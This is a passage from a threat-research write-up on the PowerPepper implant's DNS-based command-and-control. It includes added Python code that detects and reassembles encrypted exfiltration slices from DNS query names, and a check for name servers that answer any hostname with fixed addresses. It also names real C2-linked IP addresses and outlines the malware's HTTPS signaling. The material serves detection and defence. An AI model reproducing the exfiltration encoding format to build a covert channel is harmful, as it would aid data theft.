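As an added example that is not part of the original article, the Python below parses the hostname layout shown above and reassembles the hex slices carried by one session’s A-type queries. Field semantics beyond what the sample shows are assumptions: the two constant labels (“0” and “1”) are treated as fixed, the label after them as the number of populated slots, and each query as carrying three chunk slots with “0” as filler. The identifier (a1b2) and the C2 domain (c2.example) are hypothetical, and the query list is constructed from the sample above. Since the payload is AES-encrypted with a key the network observer does not hold, the result is the ciphertext blob, which is what a DNS log pipeline can flag and retain for later analysis.

```python
"""Detect and reassemble PowerPepper-style A-record exfiltration from DNS query names.

Added example, not Kaspersky code. Layout (from the article's sample):
  <ident>.<marker>.<seq>.0.1.<count>.<slot1>.<slot2>.<slot3>.<domain>
marker: be = session start, ef = data slice, ca = session end.
Assumptions: the "0" and "1" labels are constant, <count> is the number of
populated slots, and there are always three slots with "0" as filler."""
import re
from collections import defaultdict

MARKERS = ("be", "ef", "ca")
SLOTS = 3                              # chunk slots per query in the sample (assumption)
HEX = re.compile(r"^[0-9A-Fa-f]+$")

# Constructed query sequence for one hypothetical client (a1b2) and C2 domain.
SAMPLE_QUERIES = [
    "a1b2.be.0.0.1.0.0.0.0.c2.example",
    "a1b2.ef.1.0.1.3.BDA2ADBE3C79C9EF6630.DDD4B8D4504FEC348C9C.2F53BFB60C1890585CF7.c2.example",
    "www.example.com",                  # benign noise
    "a1b2.ef.2.0.1.3.72DE8DDB802C4829B2DE.40CB7163E83DE0B4A002.6B6C2E555A931721A525.c2.example",
    "a1b2.ef.3.0.1.2.1699380DBABAB113D32B.7869501E5FEDD524304B.0.c2.example",
    "a1b2.ca.4.0.1.00.0.0.0.c2.example",
]


def parse_query(qname):
    """Return the decoded fields of one query name, or None if it does not fit."""
    labels = qname.rstrip(".").split(".")
    if len(labels) < 6 + SLOTS + 1:      # header + slots + at least one domain label
        return None
    ident, marker, seq, fixed0, fixed1, count = labels[:6]
    chunks = labels[6:6 + SLOTS]
    domain = ".".join(labels[6 + SLOTS:])
    if marker not in MARKERS or not seq.isdigit() or not count.isdigit():
        return None
    if (fixed0, fixed1) != ("0", "1") or not all(HEX.match(c) for c in chunks):
        return None
    populated = min(int(count), SLOTS)
    data = "".join(chunks[:populated]) if marker == "ef" else ""
    return {"ident": ident, "marker": marker, "seq": int(seq),
            "domain": domain, "data": data}


def reassemble(qnames):
    """Group matching queries by (identifier, domain) and rebuild each session's hex blob."""
    sessions = defaultdict(lambda: {"start": False, "end": False, "slices": {}})
    for qname in qnames:
        p = parse_query(qname)
        if p is None:
            continue
        s = sessions[(p["ident"], p["domain"])]
        if p["marker"] == "be":
            s["start"] = True
        elif p["marker"] == "ca":
            s["end"] = True
        else:
            s["slices"][p["seq"]] = p["data"]
    results = {}
    for key, s in sessions.items():
        seqs = sorted(s["slices"])
        hexdata = "".join(s["slices"][i] for i in seqs)
        # A session is complete when start and end were seen and slices are 1..n gap-free.
        complete = s["start"] and s["end"] and seqs == list(range(1, len(seqs) + 1))
        results[key] = {"complete": complete, "slices": len(seqs),
                        "hex": hexdata, "ciphertext": bytes.fromhex(hexdata)}
    return results


if __name__ == "__main__":
    for (ident, domain), r in reassemble(SAMPLE_QUERIES).items():
        print(f"{ident}@{domain}: complete={r['complete']} slices={r['slices']} "
              f"ciphertext={len(r['ciphertext'])} bytes")
```

Run over passive DNS or resolver query logs keyed by client, this gives the same signal as a NIDS pattern on the query name, with the advantage that a complete be/ef/ca sequence is a much stronger indicator than any single query. As the article notes, the exact labels changed across variants, so the marker strings and the fixed labels are the parameters to revisit for newer samples.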

During our investigations, we noticed that the PowerPepper C2 name servers were actually open DNS resolvers that always resolved arbitrary hostnames to the same IP addresses: 128.49.4.4 (a US Navy-owned server), 91.214.6.100 and 91.214.6.101 (HSBK UK-owned servers). Using this fact together with historical reverse DNS data, we were able to identify PowerPepper C2 domains preemptively.
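An added example (not Kaspersky’s code) of the check the paragraph above implies: ask a suspect name server for several random labels under the domain and see whether every one of them resolves to the same non-empty address set. The resolver is injected as a callable so the logic runs offline against a constructed fake that uses TEST-NET addresses rather than the page’s real IPs; a real run would send the queries to the domain’s NS records directly (for example with dnspython’s Resolver and its nameservers attribute), since the stdlib `system_resolve` below only shows the recursive resolver’s view.

```python
"""Check whether a name server answers any label under a domain with one fixed
address set, the trait described for PowerPepper's C2 name servers.
Added example, not Kaspersky code; the fake zone data is constructed."""
import random
import socket
import string


def random_labels(count, length=12, seed=None):
    """Labels that cannot exist by accident, so a positive answer is a wildcard."""
    rng = random.Random(seed)
    alphabet = string.ascii_lowercase + string.digits
    return ["".join(rng.choice(alphabet) for _ in range(length)) for _ in range(count)]


def fixed_answer_check(domain, resolve, probes=4, seed=None):
    """Return (is_fixed, ips). is_fixed is True when every random label under
    `domain` resolves to the same non-empty set of addresses."""
    answers = []
    for label in random_labels(probes, seed=seed):
        ips = frozenset(resolve(f"{label}.{domain}"))
        if not ips:
            return False, set()          # a genuine NXDOMAIN rules it out
        answers.append(ips)
    return len(set(answers)) == 1, set(answers[0])


def system_resolve(hostname):
    """Real resolver through the OS (recursive view only); empty set on NXDOMAIN."""
    try:
        return set(socket.gethostbyname_ex(hostname)[2])
    except socket.gaierror:
        return set()


# Constructed fake DNS view for offline use (TEST-NET addresses).
FAKE_ZONES = {
    "c2-like.example": {"192.0.2.10", "192.0.2.11"},   # answers anything with fixed IPs
}


def fake_resolve(hostname):
    for zone, ips in FAKE_ZONES.items():
        if hostname.endswith("." + zone):
            return ips
    if hostname == "www.legit.example":
        return {"198.51.100.5"}
    return set()                          # everything else is NXDOMAIN


if __name__ == "__main__":
    for d in ("c2-like.example", "legit.example"):
        print(d, fixed_answer_check(d, fake_resolve, seed=1))
```

Wildcard DNS records, domain-parking services and CDNs also answer every label with fixed addresses, so a positive result is a triage signal to combine with the reverse DNS history the article mentions, not a verdict on its own.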

PowerPepper signaling and targets validation

On top of the DNS C2 communication logic, PowerPepper also signals successful implant startup and execution-flow errors to a Python backend over HTTPS. This signaling enables target validation and implant execution logging, while preventing researchers from interacting further with PowerPepper’s malicious C2 name servers. It has also been used directly from some of the malicious documents involved in PowerPepper delivery, through the remote-source links feature in Office documents.

The signaling Python backends were hosted on PythonAnywhere, a public and legitimate content hosting web service that allows users to build websites. The Python backend endpoints we discovered were shut down by PythonAnywhere in coordination with us. In response, DeathStalker tried to adapt the signaling feature by removing it from most PowerPepper delivery documents (but keeping it in the implant itself), and by adding a legitimate but compromised WordPress website as a reverse proxy between implants and backends.

PowerPepper delivery chains: a surprising journey into mercenaries’ tricks, from Russian dolls to plant-covered steganography

The macro-based delivery chain: when you are way too much into this whole “Russian dolls” idea

The first type of PowerPepper delivery (or infection) chain we encountered, back in July 2020, is based on a malicious Word document. Although we could not confirm how such document had been distributed to targets, infection trails and documents we analyzed would show tha